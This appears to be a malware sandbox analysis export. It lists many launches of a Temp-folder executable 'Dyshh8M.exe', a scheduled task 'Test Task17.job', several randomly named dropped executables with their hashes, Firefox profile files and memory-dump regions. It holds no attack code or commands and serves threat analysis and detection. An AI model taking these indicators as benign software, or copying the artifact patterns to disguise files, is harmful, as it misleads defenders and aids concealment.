"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3700,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4936 /prefetch:8

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe

"C:\Users\Admin\AppData\Local\Temp\10036650101\Dyshh8M.exe"

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4776,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=4836 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5172,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5076 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5176,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5280 /prefetch:8

C:\Program Files\Google\Chrome\Application\chrome.exe

"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4832,i,14756763287253946200,7725694465306158819,262144 --variations-seed-version=20250216-180425.389000 --mojo-platform-channel-handle=5428 /prefetch:8

Network

Files


memory/5840-626-0x00000000009E0000-0x0000000000EBE000-memory.dmp

C:\Windows\Tasks\Test Task17.job

MD5 9a4ee7dae94658aaf116f7f9b13a2186
SHA1 9e6569bb263ef7f1bf8723569b068330cb5169a2
SHA256 11d37b8006c4f736c26496788877f535e5dd87001f74fa18c2337927853d2e89
SHA512 ba059d9b715a942a38a2b38f5db6f32b701a2125c2f88fcd9ed0115eb1d57cecde728cb13a1f4dee876f3b086a3b9a3af5a57a02b2faeddfa138e5160672c3f0

C:\Users\Admin\AppData\Local\Temp\10036510101\9a7ac1fba5.exe

MD5 e551ee3c02e04a54815f4a7425823acb
SHA1 0c737ab4bc14a7ba1865937339e0d2a9a214b9e1
SHA256 81227bc4b3aaa4ca09473f192bff56186c3f89e11899ca6ea1289412fa90b657
SHA512 090708de73e923f443436b44ff27158d02381552bc952c4a2d06fbd441ba9134dcf1418aa403918632c233e466df8a39b67203ee378d2cb686cb3bde9c5c937a

memory/1428-670-0x00000000004D0000-0x0000000000924000-memory.dmp

memory/1428-671-0x00000000004D0000-0x0000000000924000-memory.dmp

memory/1428-672-0x00000000004D0000-0x0000000000924000-memory.dmp

memory/3040-676-0x0000000000400000-0x000000000087F000-memory.dmp

memory/2160-706-0x00000000009E0000-0x0000000000EBE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\prefs.js

MD5 0112667b94cac615504ffc739f652a3f
SHA1 99f9462515dfaff29297807804ca5aac36970b75
SHA256 9dd2b7290bf9ba65e798c7a9d31843e9cab527f7e107ea7f814b3e4a5e1f3ad8
SHA512 c9eda6dc2797357b977e522fb2d14c043213b03cc35e6c5ab10e4bb141edacfdade3e727f299cfe307bae7738166e7a18b127b0bfa1299e731296e34ae6465a9

memory/676-716-0x0000000000D60000-0x0000000001064000-memory.dmp

memory/5848-723-0x0000000000400000-0x000000000087F000-memory.dmp

memory/5848-724-0x0000000000400000-0x000000000087F000-memory.dmp

memory/1428-728-0x00000000004D0000-0x0000000000924000-memory.dmp

memory/1428-731-0x00000000004D0000-0x0000000000924000-memory.dmp

memory/3040-732-0x0000000000400000-0x000000000087F000-memory.dmp

memory/2160-733-0x00000000009E0000-0x0000000000EBE000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036560101\1d12573256.exe

MD5 f9ff1782c634319b0faf726e9910f592
SHA1 bcd481deb29fde172fe9631f79a386da9a9067db
SHA256 fe80c165e1a9aa7009013df5372b491bf5612564b327cfa7ca5b2df987da172c
SHA512 1446c9db289ae66bc176dc8f0d19920798bebc6949a773ba9ec4b879fe1eb6d45f16a2de9366e44c981ab1701ac83b2a0bcc9352f9d594d861324b33ef8b85d1

memory/5812-748-0x00000000000F0000-0x0000000000B21000-memory.dmp

memory/676-749-0x0000000000D60000-0x0000000001064000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp

MD5 0342e2b6c66bc6241b0651601c6e6bff
SHA1 491b764ce1a86cb35670b9fcfbab1fbe6e5c274a
SHA256 039b8388c083531339ab8a90b9f16671f0f79c149844c44e2b013943387d565a
SHA512 fd88593126f834bbefcf3e10779466ece86500b6e660ec3a31ba4484c62f78e62be30b48eb92936b89f113b42abfdea7bcf96984eca552e397fcc4b990627ba3

C:\Users\Admin\AppData\Local\Temp\tmpaddon

MD5 09372174e83dbbf696ee732fd2e875bb
SHA1 ba360186ba650a769f9303f48b7200fb5eaccee1
SHA256 c32efac42faf4b9878fb8917c5e71d89ff40de580c4f52f62e11c6cfab55167f
SHA512 b667086ed49579592d435df2b486fe30ba1b62ddd169f19e700cd079239747dd3e20058c285fa9c10a533e34f22b5198ed9b1f92ae560a3067f3e3feacc724f1

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\prefs.js

MD5 76b6e737cfb7dec2d82564f202a15414
SHA1 328b72e5dcdba9cf0635882ca54653968c8af8bd
SHA256 9664872a081ecca29c94e2dad32786370bae15b3780c8a4f6588427f90d0fddc
SHA512 89d6fde59d3b06aafc535152a1fbd898c5f10ecf5ea15e660c753cae5e55275cce6aacc3e8e7b9431bc7c3a6c1f3c9e3cddf5e0bf852535dff800af0bc953f7c

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.info

MD5 2a461e9eb87fd1955cea740a3444ee7a
SHA1 b10755914c713f5a4677494dbe8a686ed458c3c5
SHA256 4107f76ba1d9424555f4e8ea0acef69357dfff89dfa5f0ec72aa4f2d489b17bc
SHA512 34f73f7bf69d7674907f190f257516e3956f825e35a2f03d58201a5a630310b45df393f2b39669f9369d1ac990505a4b6849a0d34e8c136e1402143b6cedf2d3

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\gmp-gmpopenh264\2.3.2\gmpopenh264.dll

MD5 842039753bf41fa5e11b3a1383061a87
SHA1 3e8fe1d7b3ad866b06dca6c7ef1e3c50c406e153
SHA256 d88dd3bfc4a558bb943f3caa2e376da3942e48a7948763bf9a38f707c2cd0c1c
SHA512 d3320f7ac46327b7b974e74320c4d853e569061cb89ca849cd5d1706330aca629abeb4a16435c541900d839f46ff72dfde04128c450f3e1ee63c025470c19157

memory/5848-805-0x0000000000400000-0x000000000087F000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\prefs-1.js

MD5 a47245e2d2fa0fec2f9415aae474c636
SHA1 3411249c1ae33d9588af132ccf3128d1a939ecf0
SHA256 cbe5699ce04e83c29b5d76724287b7c7ae0f1b8ff2ff9d7cc105e3a1769a711d
SHA512 ba93fdf7e860a0f26b4afafb71d0da32e20f9fe9fbe0a71ed099bad5ab1d19b19eef3789e9bad9073e6b6c170cfb7516f1aa9e73d864a9a901eba404783f8ca4

C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\outbhah2.default-release\cache2\entries\ADF5BD09EB688DAB1F35EE02E8C35329D0E4AD89

MD5 aa725fff6f594ca84cd22efc2543b62a
SHA1 4d22a1ec48c4757e3f9f2de83161256872845a4d
SHA256 4106c4736776ff26f7a5e20abffea25ec0d907aa480781a4b11c8005a415a641
SHA512 7cb64832d3c3e43de774189ec64f75bb467eaf4ae9dc7dcdbd2031f119046e1c8dd61f00574227108012d64eaf863422e4152ff018810a53a027aaed72b8ed78

C:\Users\Admin\AppData\Local\Temp\tmpaddon-1

MD5 0a8747a2ac9ac08ae9508f36c6d75692
SHA1 b287a96fd6cc12433adb42193dfe06111c38eaf0
SHA256 32d544baf2facc893057a1d97db33207e642f0dacf235d8500a0b5eff934ce03
SHA512 59521f8c61236641b3299ab460c58c8f5f26fa67e828de853c2cf372f9614d58b9f541aae325b1600ec4f3a47953caacb8122b0dfce7481acfec81045735947d

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\gmp-widevinecdm\4.10.2710.0\manifest.json

MD5 bf957ad58b55f64219ab3f793e374316
SHA1 a11adc9d7f2c28e04d9b35e23b7616d0527118a1
SHA256 bbab6ca07edbed72a966835c7907b3e60c7aa3d48ddea847e5076bd05f4b1eda
SHA512 79c179b56e4893fb729b225818ab4b95a50b69666ac41d17aad0b37ab0ca8cd9f0848cbc3c5d9e69e4640a8b261d7ced592eae9bcb0e0b63c05a56e7c477f44e

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\gmp-widevinecdm\4.10.2710.0\widevinecdm.dll

MD5 daf7ef3acccab478aaa7d6dc1c60f865
SHA1 f8246162b97ce4a945feced27b6ea114366ff2ad
SHA256 bc40c7821dcd3fea9923c6912ab1183a942c11b7690cfd79ed148ded0228777e
SHA512 5840a45cfdb12c005e117608b1e5d946e1b2e76443ed39ba940d7f56de4babeab09bee7e64b903eb82bb37624c0a0ef19e9b59fbe2ce2f0e0b1c7a6015a63f75

memory/3040-917-0x0000000000400000-0x000000000087F000-memory.dmp

memory/2160-956-0x00000000009E0000-0x0000000000EBE000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\datareporting\glean\db\data.safe.tmp

MD5 6b7c45169292dea0311652af2b616b95
SHA1 39e3607bef7e01e321632503cfb0c887c0fc3d87
SHA256 d04a8974b69cdd0af670eda5dea97a17bbeed8cb929a1169abbb821e72c9c4bb
SHA512 4d705aea2abf96584c4cb810a1bf4899ea87dfd7aae41f91ba091743ce68584d3c4b2ae91eef8f1d214f539709192594bb56f7965ef2f2742a6a3fe5febfe995

memory/5812-1024-0x00000000000F0000-0x0000000000B21000-memory.dmp

memory/5812-1026-0x00000000000F0000-0x0000000000B21000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\10036570101\3c3e7e563d.exe

MD5 c217106f24ae6e1832d8380cbe1d87e0
SHA1 e805de3353dd76d659999f486b23968babae3c7b
SHA256 bba85826623aa30104d734a17eaf97d6714f80d139ff628152e3371a86209b8b
SHA512 913122846a882246801ad953484b20d1cdf40a9056b03da1a438c78a670b2dbf37876a6d8eef14104f9d60e9e875556ae41f85300bf90a722b1cc0138103bcdb

memory/5296-1061-0x00000000005A0000-0x00000000008B4000-memory.dmp

memory/676-1085-0x0000000000D60000-0x0000000001064000-memory.dmp

memory/5904-1092-0x0000000000400000-0x000000000042F000-memory.dmp

memory/5904-1177-0x0000000000400000-0x000000000042F000-memory.dmp

memory/5812-1189-0x00000000000F0000-0x0000000000B21000-memory.dmp

C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\outbhah2.default-release\prefs-1.js

MD5 6f283fe6d80e4b0171d16f7d30984cf6
SHA1 2f66e6ad05191568eb4f9666fe9e6ec8d06343b0
SHA256 4bd7f2234e20c43fe0bbfbed4b729c8f68bbb74ab7219d796e7932481ec9214f
SHA512 ac9e33c693f51653b257b58bb6b40b1a89cd307dc92c80a061822c841ea64004141437a7969d4fd97f7f70650cec4d28f0b6286548f2ba9ce629f68678731145

memory/5848-1450-0x0000000000400000-0x000000000087F000-memory.dmp

memory/5904-1501-0x0000000010000000-0x000000001001C000-memory.dmp

